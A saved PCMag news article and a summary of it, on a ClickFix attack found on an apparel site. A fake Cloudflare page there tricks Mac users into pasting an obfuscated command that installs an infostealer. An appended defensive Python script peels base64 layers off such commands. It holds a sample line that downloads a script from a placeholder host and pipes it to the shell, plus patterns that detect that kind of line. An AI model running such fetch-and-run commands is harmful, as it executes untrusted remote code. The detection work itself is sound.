FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack
Recorded: May 23, 2026, 12:57 a.m.
| Original | Summarized |
Kash Patel's Apparel Site Is Trying To Trick Visitors Into Installing Malware | PCMag
The FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack, which involves duping users into running a seemingly benign, but malicious command.

By Michael Kan, Principal Reporter
May 21, 2026

An apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware.

The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers.

The attack seems to trigger as the user visits BasedApparel.com: the victim encounters a page pretending to come from Cloudflare, which powers “Verify you are human” CAPTCHA tests and offers DDoS protection.

The fake Cloudflare page will show a warning saying “Unusual Web Traffic Detected,” while also requiring the user to verify that they’re human. But to do so, the page posts some unusual instructions that call for the user to open Terminal, a built-in utility in macOS that can execute programs.

The user is then told to click the “Copy” button on the page to copy the command “I am not a robot: Cloudflare Verification ID: 801470.” But in reality, clicking the button will copy a much longer obfuscated text that looks like gibberish, although it's actually a hidden command.

[Image: The actual copied command when you click the copy button. (PCMag)]

The user is then told to paste and run the command in Terminal, thus executing the instructions without realizing the danger. The hidden command will decode and fetch a shell script containing a list of commands from the hacker-controlled web domain.

PCMag encountered the attack while navigating BasedApparel.com on a MacBook, although we were only able to trigger the fake Cloudflare page once over the Chrome browser.

The user on X who flagged the threat, “debbie,” told PCMag she encountered the attack after reading an article in The Atlantic about Patel that linked to the Based Apparel site.

“The ClickFix attack just kinda popped up when I was browsing it,” Debbie said in an email. “I took a quick look and it's just a classic infostealer, wrapped twice in base64 (binary-to-text encoding). It's interesting that it's written in Applescript though.”

debbie, who described herself as a “big nerd,” managed to retrieve the malicious shell script payload, which we ran through VirusTotal. The payload was flagged by 27 antivirus engines as malicious, classifying it as Trojan and infostealer. The attack seems to work through a series of instructions that, if run through macOS’s Terminal utility, could steal stored credentials from Chromium-based browsers along with data from cryptocurrency wallets, placing them into a zip archive that is then sent to a hacker-controlled domain.

The attack suggests a hacker compromised some portion of BasedApparel.com. The ClickFix threat has remained pervasive in recent years, fooling less tech-savvy users. Security researchers have warned that the hackers behind ClickFix schemes have been circulating their attacks by stealing the login credentials for legitimate websites, tampering with exposed admin panels, or hitting vulnerable plugins.

Based Apparel didn’t immediately respond to a request for comment. But the attack is a reminder to be vigilant around pop-ups and other scareware tactics. Apple recently introduced a safeguard in macOS Tahoe 26.4 that can stop and warn users against running copied-and-pasted commands into the Terminal utility, citing the potential of malware.
|
An apparel website associated with FBI director Kash Patel, BasedApparel.com, was discovered trying to trick macOS users into installing malware through a "ClickFix" attack. The scheme involved a deceptive webpage impersonating Cloudflare, which powers "Verify you are human" CAPTCHA tests and offers DDoS protection. Upon visiting the site, victims would be shown a warning regarding "Unusual Web Traffic Detected" and prompted to verify their humanity. To proceed, the page provided instructions directing the user to open the Terminal utility, a built-in macOS application capable of executing programs. The user was instructed to click a "Copy" button to copy a specific string, ostensibly the "Cloudflare Verification ID," and paste it into Terminal. However, the button actually copied a much longer, obfuscated text string, which was a hidden command. Running this hidden command in Terminal decoded the string and fetched a shell script payload from a hacker-controlled domain. The payload functions as an infostealer, wrapped twice in base64 (binary-to-text encoding) and written in AppleScript. The attack leverages the Terminal utility to execute a series of instructions that facilitate data exfiltration. The malicious shell script was capable of stealing stored credentials from Chromium-based browsers as well as sensitive data from cryptocurrency wallets, archiving this information into a zip file before transmitting it to the hacker's domain. The article suggests that such attacks are often executed by compromising legitimate websites through the theft of login credentials, tampering with exposed administrative panels, or exploiting vulnerable plugins.
In response to this threat, Apple has implemented a safeguard in macOS Tahoe 26.4 to warn users against running copied-and-pasted commands in the Terminal utility, citing the potential risk of malware execution. |
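
A triage helper for the pasted-command pattern the article describes, as an added example (not code from PCMag, the researcher, or the actual payload): it peels nested base64 layers from a clipboard string without executing anything and flags what the decoded layers would do. The sample command, the `example.invalid` URL, the 24-character threshold and the indicator patterns are constructed assumptions.

```python
import base64
import binascii
import re

# Base64-looking runs long enough to hide a command (24 is an assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Illustrative indicators checked on every layer; not an exhaustive rule set.
INDICATORS = {
    "decode-piped-to-shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^\n|]*\|\s*(ba|z)?sh\b"),
    "download-piped-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b"),
    "applescript-execution": re.compile(r"\bosascript\b"),
}

def _try_decode(blob):
    """Return the decoded text if blob is strict base64 of readable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c.isspace() for c in text) else None

def peel(command, max_depth=5):
    """Return [pasted text, layer 1, layer 2, ...], decoding without executing anything."""
    layers = [command]
    for _ in range(max_depth):
        runs = sorted(B64_RUN.findall(layers[-1]), key=len, reverse=True)
        decoded = next((d for d in map(_try_decode, runs) if d), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers

def triage(command):
    """Summarise how many encoded layers were found and which indicators fired."""
    layers = peel(command)
    hits = sorted(n for n, rx in INDICATORS.items() if any(rx.search(l) for l in layers))
    return {"encoded_layers": len(layers) - 1, "final_layer": layers[-1], "indicators": hits}

# Constructed sample: a harmless placeholder command wrapped twice in base64.
INNER = "curl -fsSL https://example.invalid/verify.sh | sh"
_blob = base64.b64encode(base64.b64encode(INNER.encode())).decode()
SAMPLE = f"echo {_blob} | base64 -D | base64 -D | sh"
# The text the fake page claimed would be copied, as quoted in the article.
DISPLAYED = "I am not a robot: Cloudflare Verification ID: 801470"

if __name__ == "__main__":
    for label, text in (("displayed", DISPLAYED), ("clipboard", SAMPLE)):
        print(label, triage(text))
```

Comparing the result for the displayed string with the result for the clipboard contents shows the mismatch a help desk or analyst should look for before anything is pasted into Terminal.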